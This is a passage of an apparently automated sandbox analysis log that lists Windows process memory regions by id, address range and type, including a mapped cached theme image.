0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17487 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17489 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17490 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17491 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17494 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17495 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17496 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17497 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17498 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17499 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17500 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17501 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17502 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17503 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17504 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17505 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17506 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17507 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17508 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17509 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17510 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17511 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17512 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17513 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17514 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17515 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17516 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17517 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17518 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17519 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17520 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17533 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17534 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17535 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17536 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17537 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17540 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17541 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17542 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17543 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17544 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 17545 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 17546 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 17547 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17548 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17549 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17568 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17569 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17573 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17574 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17575 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17576 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17577 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17578 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17579 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17580 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17581 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17582 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17583 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17584 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17585 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17586 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17593 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17596 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17597 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17598 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17599 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17600 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17601 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17602 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17603 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17604 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17605 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17606 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17607 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17608 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17609 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17610 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17611 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17612 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17613 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17614 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17615 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17616 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17617 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17618 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17619 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17620 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17621 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17622 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17623 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17624 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17625 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17626 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17627 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17628 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17629 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17630 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17631 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17632 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17633 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17634 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17635 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17636 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 17637 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 17638 start_va = 0x3ec0000 end_va = 0x3edbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ec0000" filename = "" Region: id = 17639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 17662 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17663 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17664 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17665 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17666 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 17667 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 